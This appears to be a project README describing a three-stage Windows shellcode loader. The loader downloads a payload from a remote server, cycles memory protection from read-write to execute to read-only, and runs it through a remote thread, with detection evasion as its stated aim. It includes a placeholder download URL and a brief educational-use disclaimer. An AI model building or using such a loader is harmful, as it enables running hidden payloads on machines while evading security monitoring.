A three-stage shellcode loader that demonstrates memory protection manipulation for evasion. This project splits the execution flow across three separate executables to minimize detection signatures.
The loader operates in three distinct phases, each with its own executable:
- Stage 1: Downloads shellcode and allocates it with
PAGE_READWRITEprotection - Stage 2: Changes memory protection to
PAGE_EXECUTE_READto enable execution - Stage 3: Executes shellcode, then reverts protection to
PAGE_READONLYto hide
- Downloads shellcode from a remote HTTP server
- Allocates memory with
PAGE_READWRITEprotection - Creates shared memory to communicate shellcode location
- Runs continuously, waiting for execution commands
- Connects to Stage 1 via shared memory
- Changes memory protection from
READWRITEtoEXECUTE_READ - Exits after changing permissions
- Finds and connects to running loader
- Creates remote thread to execute shellcode
- Changes protection back to
READONLYafter execution - Can be run multiple times (execution counter increments)
- Memory Protection Cycling: RW → RX → RO to minimize detection
- Shared Memory Coordination: Processes communicate via memory-mapped files
- Automatic Loader Discovery: Stage 3 can find running loaders automatically
- Re-executable: Shellcode can be run multiple times with protection toggling
- HTTP Payload Delivery: Remote shellcode fetching
- Configure the URL:
#define SHELLCODE_URL "http://your-server/payload.bin"This tool is for educational purposes only. Use only in environments you own or have explicit permission to test. The authors are not responsible for any misuse.